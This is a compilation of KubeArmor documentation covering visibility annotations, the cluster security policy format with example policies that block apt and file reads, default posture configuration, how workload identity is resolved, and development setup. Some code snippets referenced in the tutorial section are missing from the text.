For pre-existing workloads: enable visibility using kubectl annotate. Currently KubeArmor supports process, file, network, and capabilities.
Open up a terminal, and watch logs using the karmor CLI.
In another terminal, simulate a policy violation. Try running sleep inside a pod.
In the terminal running karmor logs, the policy violation along with container visibility is shown, for example as below.
The logs can also be generated in JSON format using karmor logs --json.
Host visibility is not enabled by default. To enable host visibility we need to annotate the node using kubectl annotate node.
To confirm it, use kubectl describe and grep for kubearmor-visibility.
Now we can get general telemetry events in the context of the host using karmor logs. The logs related to host visibility will have Type: HostLog and Operation: File | Process | Network.
KubeArmor lets the user select what kinds of events are traced by changing the kubearmor-visibility annotation on the namespace.
Checking namespace visibility
Namespace visibility can be checked using kubectl describe.
To update the visibility of a namespace: let's update the KubeArmor visibility using kubectl annotate. Currently KubeArmor supports process, file, network, and capabilities.
Let's try to update visibility for the namespace wordpress-mysql.
Note: To turn off visibility across all aspects, use kubearmor-visibility=none. Note that any policy violations or events that result in non-success returns will still be reported in the logs.
Open up a terminal, and watch logs using the karmor CLI.
In another terminal, let's exec into the pod and run some process commands. Try running ls inside the pod.
Now, we can notice that no logs have been generated for the above command, and only logs with Operation: Network are shown.
Note: If telemetry is disabled, the user won't get an audit event even if there is an audit rule.
Note: Only the logs are affected by changing the visibility; we still get all the alerts that are generated.
Let's simulate a sample policy violation, and see whether we still get alerts or not.
Policy violation:
Here, note that the alert with Operation: Process is reported.
kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/examples/wordpress-mysql/security-policies/ksp-wordpress-block-process.yaml
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl describe -n wordpress-mysql pod $POD_NAME | grep kubearmor-visibility
kubearmor-visibility: process, file, network, capabilities
kubectl annotate pods <pod-name> -n wordpress-mysql "kubearmor-visibility=process,file,network,capabilities"
karmor logs
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
# apt update
kubectl annotate node <node-name> "kubearmor-visibility=process,file,network,capabilities"
kubectl describe node <node-name> | grep kubearmor-visibility
karmor logs --logFilter=all
== Alert / 2023-01-04 04:58:37.689182 ==
== Log / 2023-01-27 14:41:49.017709 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/dockerd
Resource: /usr/bin/runc --version
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018951 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /lib/x86_64-linux-gnu/libc.so.6
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.018883 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /usr/bin/runc --version
Resource: /etc/ld.so.cache
Operation: File
Data: syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC
Result: Passed
HostPID: 193088
HostPPID: 914
PID: 193088
PPID: 914
ParentProcessName: /usr/bin/dockerd
ProcessName: /usr/bin/runc
== Log / 2023-01-27 14:41:49.020905 ==
ClusterName: default
HostName: kubearmor-dev2
Type: HostLog
Source: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
Resource: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
Operation: Process
Data: syscall=SYS_EXECVE
Result: Passed
HostPID: 193090
HostPPID: 5627
PID: 193090
PPID: 5627
ParentProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/k3s
ProcessName: /var/lib/rancher/k3s/data/2949af7261ce923f6a5091396d266a0e9d9436dcee976fcd548edc324eb277bb/bin/portmap
kubectl describe ns wordpress-mysql | grep kubearmor-visibility
kubearmor-visibility: process, file, network, capabilities
kubectl annotate ns wordpress-mysql kubearmor-visibility=network --overwrite
"namespace/wordpress-mysql annotated"
karmor logs --logFilter=all -n wordpress-mysql
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
# ls
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
# apt
Here is the specification of a Cluster security policy.
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: [policy name]
  namespace: [namespace name]          # --> optional
spec:
  severity: [1-10]                     # --> optional
  tags: ["tag", ...]                   # --> optional
  message: [message]                   # --> optional
  selector:
    matchExpressions:
    - key: [namespace|label]
      operator: [In|NotIn]
      values:
      - [namespaces|labels]
  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]          # --> optional
      fromSource:                      # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]          # --> optional
      ownerOnly: [true|false]          # --> optional
      fromSource:                      # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]          # --> optional
  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]           # --> optional
      ownerOnly: [true|false]          # --> optional
      fromSource:                      # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]          # --> optional
      readOnly: [true|false]           # --> optional
      ownerOnly: [true|false]          # --> optional
      fromSource:                      # --> optional
      - path: [absolute executable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]           # --> optional
      ownerOnly: [true|false]          # --> optional
  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:                      # --> optional
      - path: [absolute executable path]
  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                      # --> optional
      - path: [absolute executable path]
  syscalls:
    matchSyscalls:
    - syscall:
      - syscallX
      - syscallY
      fromSource:                      # --> optional
      - path: [absolute executable path]
      - dir: [absolute directory path]
        recursive: [true|false]        # --> optional
    matchPaths:
    - path: [absolute directory path | absolute executable path]
      recursive: [true|false]          # --> optional
    - syscall:
      - syscallX
      - syscallY
      fromSource:                      # --> optional
      - path: [absolute executable path]
      - dir: [absolute directory path]
        recursive: [true|false]        # --> optional
  action: [Allow|Audit|Block] (Block by default)
Note: For system calls monitoring, only the Audit action is supported, no matter what the value of action is.
Now, we will briefly explain how to define a cluster security policy.
A cluster security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion would be the same in any security policies. In the case of metadata, you need to specify the names of a policy and a namespace where you want to apply the policy and kind would be KubeArmorClusterPolicy.
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: [policy name]
  namespace: [namespace name]
The severity part is somewhat important. You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.
severity: [1-10]
The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.
tags: ["tag1", ..., "tagN"]
The message part is optional. You can add an alert message, and then the message will be presented in alert logs.
message: [message]
In the selector section for cluster-based policies, we use matchExpressions to define the namespaces where the policy should be applied and labels to select/deselect the workloads in those namespaces. Currently, only namespaces and labels can be matched, so the key should be 'namespace' or 'label'. The operator determines whether the policy should apply to the namespaces and workloads specified in the values field or not. Multiple matchExpressions (namespace and label) are ANDed together.
Operator: In
When the operator is set to In, the policy will be applied only to the namespaces listed and if label matchExpressions
is defined, the policy will be applied only to the workloads that match the labels in the values field.
Operator: NotIn
When the operator is set to NotIn, the policy will be applied to all other namespaces except those listed in the values field, and if a label matchExpressions is defined, the policy will be applied to all workloads except those that match the labels in the values field.
selector:
  matchExpressions:
  - key: namespace
    operator: [In|NotIn]
    values:
    - [namespaces]
  - key: label
    operator: [In|NotIn]
    values:
    - [label] # string format eg. -> (app=nginx)
TIP If the selector operator is omitted in the policy, it will be applied across all namespaces.
In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (Policy Core Reference). Thus, we generally do not recommend using this match.
process:
  matchPaths:
  - path: [absolute executable path]
    ownerOnly: [true|false]            # --> optional
    fromSource:                        # --> optional
    - path: [absolute executable path]
  matchDirectories:
  - dir: [absolute directory path]
    recursive: [true|false]            # --> optional
    ownerOnly: [true|false]            # --> optional
    fromSource:                        # --> optional
    - path: [absolute executable path]
  matchPatterns:
  - pattern: [regex pattern]
    ownerOnly: [true|false]            # --> optional
In each match, there are three options.
ownerOnly (static action: allow owner only; otherwise block all)
If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.
fromSource
If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
process:
  matchPaths:
  - path: /bin/sleep
    fromSource:
    - path: /bin/bash
The file section is quite similar to the process section.
file:
  matchPaths:
  - path: [absolute file path]
    readOnly: [true|false]             # --> optional
    ownerOnly: [true|false]            # --> optional
    fromSource:                        # --> optional
    - path: [absolute file path]
  matchDirectories:
  - dir: [absolute directory path]
    recursive: [true|false]            # --> optional
    readOnly: [true|false]             # --> optional
    ownerOnly: [true|false]            # --> optional
    fromSource:                        # --> optional
    - path: [absolute file path]
  matchPatterns:
  - pattern: [regex pattern]
    readOnly: [true|false]             # --> optional
    ownerOnly: [true|false]            # --> optional
The only difference between 'process' and 'file' is the readOnly option.
readOnly (static action: allow to read only; otherwise block all)
If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.
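For instance, the following sketch (hypothetical names, namespace, and path) blocks writes to a config file while still permitting reads by combining readOnly with the Block action:
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
  name: csp-nginx-conf-readonly          # hypothetical name
spec:
  severity: 4
  selector:
    matchExpressions:
    - key: namespace
      operator: In
      values:
      - nginx1                            # illustrative namespace
  file:
    matchPaths:
    - path: /etc/nginx/nginx.conf         # illustrative path
      readOnly: true
  action:
    Block
EOF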
In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
network:
  matchProtocols:
  - protocol: [protocol] # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
    fromSource:                        # --> optional
    - path: [absolute file path]
In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in Capability List.
capabilities:
  matchCapabilities:
  - capability: [capability name]
    fromSource:                        # --> optional
    - path: [absolute file path]
In the case of syscalls, there are two types of matches: matchSyscalls and matchPaths. matchPaths can be used to target system calls aimed at a specific binary path or anything under a specific directory; additionally, you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscalls as a more general rule to match syscalls from all sources or from specific binaries.
syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                        # --> optional
    - path: [absolute executable path]
    - dir: [absolute directory path]
      recursive: [true|false]          # --> optional
  matchPaths:
  - path: [absolute directory path | absolute executable path]
    recursive: [true|false]            # --> optional
  - syscall:
    - syscallX
    - syscallY
    fromSource:                        # --> optional
    - path: [absolute executable path]
    - dir: [absolute directory path]
      recursive: [true|false]          # --> optional
There is one option in each match.
fromSource
If a path is specified in fromSource, KubeArmor will match only syscalls generated by the defined source. For better understanding, let's take the example below. Only unlink system calls generated by /bin/bash will be matched.
syscalls:
  matchSyscalls:
  - syscall:
    - unlink
    fromSource:
    - path: /bin/bash
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory.
Action
The action could be Allow, Audit, or Block. Security policies would be handled in a blacklist manner or a whitelist manner according to the action. Thus, you need to define the action carefully. You can refer to Consideration in Policy Action for more details. In the case of the Audit action, we can use this action for policy verification before applying a security policy with the Block action. For System calls monitoring, we only support audit mode no matter what the action is set to.
action: [Allow|Audit|Block]
KubeArmor supports a configurable default security posture. The security posture could be allow/audit/deny. The default posture is used when there's at least one Allow policy for the given deployment, i.e., KubeArmor is handling policies in a whitelisting manner (more about this in Considerations in Policy Action).
There are two default modes of operation available, block and audit. block mode blocks all the operations that are not allowed in the policy. audit generates telemetry events for operations that would have been blocked otherwise.
KubeArmor has 4 types of resources: Process, File, Network and Capabilities. The default posture is configurable for each of the resources separately except Process. Process-based operations are treated under the File resource only.
Note: By default, KubeArmor sets the global default posture to audit.
defaultFilePosture: block # or audit
defaultNetworkPosture: block # or audit
defaultCapabilitiesPosture: block # or audit
Or using command line flags with the KubeArmor binary
-defaultFilePosture string
configuring default enforcement action in global file context [audit,block] (default "block")
-defaultNetworkPosture string
configuring default enforcement action in global network context [audit,block] (default "block")
-defaultCapabilitiesPosture string
configuring default enforcement action in global capability context [audit,block] (default "block")
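For example, a VM/systemd deployment could start the binary with these flags (the binary path is illustrative):
sudo ./kubearmor -defaultFilePosture=block -defaultNetworkPosture=audit -defaultCapabilitiesPosture=audit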
We use namespace annotations to configure the default posture per namespace. Supported annotation keys are kubearmor-file-posture, kubearmor-network-posture and kubearmor-capabilities-posture, with values block or audit. If a namespace is annotated with a supported key and an invalid value (like kubearmor-file-posture=invalid), KubeArmor will update the value with the global default posture (i.e., to kubearmor-file-posture=block).
Let's start KubeArmor with the default network posture configured to audit via the following YAML.
sudo env KUBEARMOR_CFG=/path/to/kubearmor.yaml ./kubearmor
Contents of kubearmor.yaml
defaultNetworkPosture: audit
Here's a sample policy to allow tcp connections from the curl binary.
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-ubuntu-5-net-tcp-allow-curl
  namespace: multiubuntu
spec:
  severity: 8
  selector:
    matchLabels:
      container: ubuntu-5
  network:
    matchProtocols:
    - protocol: tcp
      fromSource:
      - path: /usr/bin/curl
  action:
    Allow
Note: This example is in the multiubuntu environment.
Inside the ubuntu-5-deployment, if we try to access a server over tcp using curl, it works as expected with no telemetry generated.
root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl 142.250.193.46
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
If we try to access udp using curl, a bunch of telemetry is generated for the udp access.
root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
curl google.com requires UDP for DNS resolution.
The generated alert has Policy Name DefaultPosture and Action Audit.
== Alert / 2022-03-21 12:56:32.999475 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: DefaultPosture
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Audit
Result: Passed
Now let's update the default network posture to block for the multiubuntu namespace.
~❯❯❯ kubectl annotate ns multiubuntu kubearmor-network-posture=block
namespace/multiubuntu annotated
Now if we try to access udp using curl, the action is blocked and related alerts are generated.
root@ubuntu-5-deployment-7778f46c67-hk6k6:/# curl google.com
curl: (6) Could not resolve host: google.com
Here curl couldn't resolve google.com due to the blocked access to UDP.
The generated alert has Policy Name DefaultPosture and Action Block.
== Alert / 2022-03-21 13:06:27.731918 ==
Cluster Name: default
Host Name: kubearmor-dev-all
Namespace Name: multiubuntu
Pod Name: ubuntu-5-deployment-7778f46c67-hk6k6
Container ID: 1f92eb4c9d730862174be04f319763a2c1ac2752669807051c42ddc78aa102d1
Container Name: ubuntu-5-container
Policy Name: ksp-ubuntu-5-net-tcp-allow
Severity: 8
Type: MatchedPolicy
Source: /usr/bin/curl google.com
Operation: Network
Resource: domain=AF_INET6 type=SOCK_DGRAM protocol=0
Data: syscall=SYS_SOCKET
Action: Allow
Result: Permission denied
Let's try to set the annotation value to something invalid.
~❯❯❯ kubectl annotate ns multiubuntu kubearmor-network-posture=invalid --overwrite
namespace/multiubuntu annotated
~❯❯❯ kubectl describe ns multiubuntu
Name: multiubuntu
Labels: kubernetes.io/metadata.name=multiubuntu
Annotations: kubearmor-network-posture: audit
Status: Active
We can see that the annotation value was automatically updated to audit, since that is the global default network posture in the KubeArmor configuration.
Here, we demonstrate how to define cluster security policies.
Process Execution Restriction
Block a specific executable - In operator (csp-in-operator-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-in-operator-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: In
values:
- nginx1
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the containers present in the namespace nginx1. For this, we define the 'nginx1' value and operator as 'In' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked.
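For example, the verification could be scripted as follows. This is a minimal sketch: the pod label selector app=nginx is an assumption about how the nginx workloads in the nginx1 namespace are labeled, and the exact error text depends on the enforcer in use.
kubectl apply -f csp-in-operator-block-process.yaml
POD=$(kubectl -n nginx1 get pod -l app=nginx -o name | head -n 1)  # assumes the nginx pods carry the label app=nginx
kubectl -n nginx1 exec -it $POD -- /usr/bin/apt update
# Expected: the command fails with a "Permission denied"-style error,
# since the cluster policy blocks /usr/bin/apt in the nginx1 namespace.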
Block a specific executable - NotIn operator (csp-not-in-operator-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-not-in-operator-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: NotIn
values:
- nginx1
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all containers in the cluster except those in the namespace nginx1. For this, we define the 'nginx1' value and the operator as 'NotIn' in selector -> matchExpressions and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is not blocked. Now try running the same command in a container inside the 'nginx2' namespace; there it should be blocked.
Block a specific executable matching labels - In operator (csp-matchlabels-in-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-matchlabels-in-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: In
values:
- nginx1
- key: label
operator: In
values:
- app=nginx
- app=nginx-dev
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in the workloads that match the labels app=nginx OR app=nginx-dev in the namespace nginx1. For this, we define 'nginx1' as the value with operator 'In' for the key namespace, and 'app=nginx' and 'app=nginx-dev' as the values with operator 'In' for the key label, in selector -> matchExpressions, and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers in the namespace 'nginx1' (using "kubectl -n nginx1 exec -it nginx-X-... -- bash") and run '/usr/bin/apt'. You will see that /usr/bin/apt is blocked. apt won't be blocked in workloads in namespace nginx1 that don't carry the labels app=nginx or app=nginx-dev, nor in workloads across other namespaces.
Block accessing specific executable matching labels, NotIn operator (csp-matchlabels-not-in-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-matchlabels-not-in-block-process
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: NotIn
values:
- nginx2
- key: label
operator: NotIn
values:
- app=nginx
process:
matchPaths:
- path: /usr/bin/apt
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/apt' in all workloads that do not carry the label app=nginx and are not in the namespace nginx2. For this, we define 'nginx2' as the value with operator 'NotIn' for the key namespace, and 'app=nginx' as the value with operator 'NotIn' for the key label, in selector -> matchExpressions, and the specific path ('/usr/bin/apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please exec into any container within the namespace 'nginx2' and run '/usr/bin/apt'; the operation is not blocked there. Then try the same in workloads in other namespaces: if they don't have the label app=nginx, the operation will be blocked, while containers that do have the label app=nginx won't be blocked.
File Access Restriction
Block accessing specific file (csp-in-operator-block-file-access.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorClusterPolicy
metadata:
name: csp-in-operator-block-file-access
spec:
severity: 8
selector:
matchExpressions:
- key: namespace
operator: NotIn
values:
- nginx2
file:
matchPaths:
- path: /etc/host.conf
fromSource:
- path: /usr/bin/cat
action:
Block
Explanation: The purpose of this policy is to block access to '/etc/host.conf' via '/usr/bin/cat' in all containers except those in the namespace 'nginx2'.
Verification: After applying this policy, please get into the container within the namespace 'nginx2' and run 'cat /etc/host.conf'. You can see the operation is not blocked and can see the content of the file. Now try to run 'cat /etc/host.conf' in container of 'nginx1' namespace, this operation should be blocked.
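For example, both namespaces can be checked as follows (the pod names are placeholders; the exact error text depends on the enforcer in use):
kubectl -n nginx2 exec -it <nginx2-pod> -- cat /etc/host.conf   # nginx2 is excluded (NotIn), so the read succeeds
kubectl -n nginx1 exec -it <nginx1-pod> -- cat /etc/host.conf   # expected to fail with a "Permission denied"-style error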
Note Other operations like Network, Capabilities, and Syscalls behave in the same way as in the security policy. The only difference lies in how the cluster policy is matched to namespaces.
Welcome back to the KubeArmor tutorial! In the previous chapter, we learned about KubeArmor's Security Policies (KSP, HSP, CSP) and how they define rules for what applications and processes are allowed or forbidden to do. We saw that these policies use selectors (like labels and namespaces) to tell KubeArmor which containers, pods, or nodes they should apply to.
But how does KubeArmor know which policy to apply when something actually happens, like a process trying to access a file? When an event occurs deep within the operating system (like a process accessing /etc/shadow
), the system doesn't just say "a pod with label app=my-web-app
did this". It provides low-level details like Process IDs (PID), Parent Process IDs (PPID), and Namespace IDs (like PID Namespace and Mount Namespace).
This is where the concept of Container/Node Identity comes in.
Think of Container/Node Identity as KubeArmor's way of answering the question: "Who is doing this?".
When a system event happens on a node – maybe a process starts, a file is opened, or a network connection is attempted – KubeArmor intercepts this event. The event data includes technical details about the process that triggered it. KubeArmor needs to take these technical details and figure out if the process belongs to:
A specific Container (which might be part of a Kubernetes Pod or a standalone Docker container).
Or, the Node itself (the underlying Linux operating system, potentially running processes outside of containers).
Once KubeArmor knows who is performing the action (the specific container or node), it can then look up the relevant security policies that apply to that identity and decide whether to allow, audit, or block the action.
Imagine you have a KubeArmorPolicy (KSP) that says: "Block any attempt by containers with the label app: sensitive-data
to read the file /sensitive/config
.":
Now, suppose a process inside one of your containers tries to open /sensitive/config
.
Without Identity: KubeArmor might see an event like "Process with PID 1234 and Mount Namespace ID 5678 tried to read /sensitive/config". Without knowing which container PID 1234 and MNT NS 5678 belong to, KubeArmor can't tell if this process is running in a container labeled app: sensitive-data
. It wouldn't know which policy applies!
With Identity: KubeArmor sees the event, looks up PID 1234 and MNT NS 5678 in its internal identity map, and discovers "Ah, that PID and Namespace belong to Container ID abc123def456...
which is part of Pod my-sensitive-pod-xyz
in namespace default
, and that pod has the label app: sensitive-data
." Now it knows this event originated from a workload targeted by the block-sensitive-file-read
policy. It can then apply the Block
action.
So, identifying the workload responsible for a system event is fundamental to enforcing policies correctly.
KubeArmor runs as a DaemonSet on each node in your Kubernetes cluster (or directly on a standalone Linux server). This daemon is responsible for monitoring system activity on that specific node. To connect these low-level events to higher-level workload identities (like Pods or Nodes), KubeArmor does a few things:
Watching Kubernetes (for K8s environments): The KubeArmor daemon watches the Kubernetes API Server for events related to Pods and Nodes. When a new Pod starts, KubeArmor gets its details:
Pod Name
Namespace Name
Labels (this is key for policy selectors!)
Container details (Container IDs, Image names)
Node Name where the Pod is scheduled. KubeArmor stores this information.
Interacting with Container Runtimes: KubeArmor talks to the container runtime (like Docker or containerd) running on the node. It uses the Container ID (obtained from Kubernetes or by watching runtime events) to get more low-level details:
Container PID (the process ID of the main process inside the container as seen from the host OS).
Container Namespace IDs (specifically the PID Namespace ID and Mount Namespace ID). These IDs are crucial because system events are often reported with these namespace identifiers.
Monitoring Host Processes: KubeArmor also monitors processes running directly on the host node (outside of containers).
KubeArmor builds and maintains an internal map that links these low-level identifiers (like PID Namespace ID + Mount Namespace ID) to the corresponding higher-level identities (Container ID, Pod Name, Namespace, Node Name, Labels).
Let's visualize how this identity mapping happens and is used:
This diagram shows the two main phases:
Identity Discovery: KubeArmor actively gathers information from Kubernetes and the container runtime to build its understanding of which system identifiers belong to which workloads.
Event Correlation: When a system event occurs, KubeArmor uses the identifiers from the event (like Namespace IDs) to quickly look up the corresponding workload identity in its map.
The KubeArmor code interacts with Kubernetes and Docker/containerd to get this identity information.
For Kubernetes environments, KubeArmor's k8sHandler
watches for Pod and Node events:
This snippet shows that KubeArmor isn't passively waiting; it actively watches the Kubernetes API for changes using standard Kubernetes watch mechanisms. When a Pod is added, updated, or deleted, KubeArmor receives an event and updates its internal state.
For Docker (and similar logic exists for containerd), KubeArmor's dockerHandler
can inspect running containers to get detailed information:
This function is critical. It takes a containerID
and retrieves its associated Namespace IDs (PidNS
, MntNS
) by reading special files in the /proc
filesystem on the host, which link the host PID to the namespaces it belongs to. It also retrieves labels and other useful information directly from the container runtime's inspection data.
This collected identity information is stored internally. For example, the SystemMonitor
component maintains a map (NsMap
) to quickly look up a workload based on Namespace IDs:
These functions from processTree.go
show how KubeArmor builds and uses the core identity mapping: it stores the relationship between Namespace IDs (found in system events) and the Container ID, allowing it to quickly identify which container generated an event.
KubeArmor primarily identifies workloads using the following:
This allows KubeArmor to apply the correct security policies, whether they are KSPs (targeting Containers/Pods based on labels/namespaces) or HSPs (targeting Nodes based on node labels).
Understanding Container/Node Identity is key to grasping how KubeArmor works. It's the crucial step where KubeArmor translates low-level system events into the context of your application workloads (containers in pods) or your infrastructure (nodes). By maintaining a map of system identifiers to workload identities, KubeArmor can accurately determine which policies apply to a given event and enforce your desired security posture.
In the next chapter, we'll look at the component that takes this identified event and the relevant policy and makes the decision to allow, audit, or block the action.
Note Skip the steps for the vagrant setup if you're directly compiling KubeArmor on the Linux host. Proceed to set up K8s on the same host by resolving any dependencies.
Requirements
Here is the list of requirements for a Vagrant environment
Clone the KubeArmor github repository in your system
Install Vagrant and VirtualBox in your environment, go to the vagrant path and run the setup.sh file
VM Setup using Vagrant
Now, it is time to prepare a VM for development.
To create a vagrant VM
Output will show up as ...
To get into the vagrant VM
Output will show up as ...
To destroy the vagrant VM
VM Setup using Vagrant with Ubuntu 21.10 (v5.13)
To use the recent Linux kernel v5.13 for dev env, you can run make
with the NETNEXT
flag set to 1
for the respective make option.
You can also make the setting static by changing NETNEXT=0
to NETNEXT=1
in the Makefile.
Requirements
Here is the list of minimum requirements for self-managed Kubernetes.
KubeArmor is designed for Kubernetes environments. If Kubernetes is not set up yet, please refer to . KubeArmor leverages CRI (Container Runtime Interface) APIs and works with Docker, containerd, or CRI-O based container runtimes. KubeArmor uses LSMs for policy enforcement; thus, please make sure that your environment supports LSMs (either AppArmor or BPF-LSM). Otherwise, KubeArmor will operate in Audit mode with no policy "enforcement" support.
Alternative Setup
You can try the following alternative if you face any difficulty in the above Kubernetes (kubeadm) setup.
Note Please make sure to set up the alternative k8s environment on the same host where the KubeArmor development environment is running.
K3s
You can also develop and test KubeArmor on K3s instead of the self-managed Kubernetes. Please follow the instructions in .
MicroK8s
You can also develop and test KubeArmor on MicroK8s instead of the self-managed Kubernetes. Please follow the instructions in .
No Support - Docker Desktops
KubeArmor does not work with Docker Desktops on Windows and macOS because KubeArmor integrates with Linux-kernel native primitives (including LSMs).
Development Setup
In order to install all dependencies, please run the following command.
The setup script will automatically install , , , and some other dependencies.
Now, you are ready to develop any code for KubeArmor. Enjoy your journey with KubeArmor.
Compilation
Check if KubeArmor can be compiled on your environment without any problems.
If you see any error messages, please let us know the issue with the full error messages through #kubearmor-development channel on CNCF slack.
Execution
In order to directly run KubeArmor in a host (not as a container), you need to run a local proxy in advance.
Then, run KubeArmor on your environment.
Note If you have followed all the above steps and are still getting the warning The node information is not available, then this could be due to a case-sensitivity discrepancy between the actual hostname (obtained by running hostname) and the hostname used by Kubernetes (under kubectl get nodes -o wide). K8s converts the hostname to lowercase, which results in a mismatch with the actual hostname. To resolve this, change the hostname to lowercase using the command hostnamectl set-hostname <lowercase-hostname>.
